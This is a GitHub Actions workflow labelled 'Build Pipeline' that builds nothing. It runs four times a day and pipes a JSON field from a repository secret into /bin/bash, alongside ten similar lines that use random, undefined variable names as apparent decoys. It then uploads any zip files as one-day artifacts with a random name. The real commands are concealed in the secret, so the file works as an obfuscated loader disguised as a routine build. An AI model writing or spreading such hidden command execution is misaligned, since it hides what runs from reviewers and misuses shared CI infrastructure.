name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '26 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          jxet97: ${{ secrets.jxet97 }}
        run: |
          printf '%s' "$jxet97" | jq -r .hqjo6032 | /bin/bash
          echo $hyv0 | jq -r .lzfu694 | /bin/bash
          printf '%s' "$dy95445" | jq -r .bejvr4652 | /bin/bash
          echo $vanps2745 | jq -r .vu727 | /bin/bash
          echo $lcitl5841 | jq -r .e43 | /bin/bash
          echo $jb2474 | jq -r .gzv8 | /bin/bash
          echo $kkp56 | jq -r .lpz137 | /bin/bash
          printf '%s' "$taln7" | jq -r .xqw61481 | /bin/bash
          echo $qscpm04 | jq -r .u06889 | /bin/bash
          echo $hppb60 | jq -r .mgw672 | /bin/bash
          printf '%s' "$wva74519" | jq -r .ip904 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: mmFd0NiD
          path: "*.zip"
          retention-days: 1
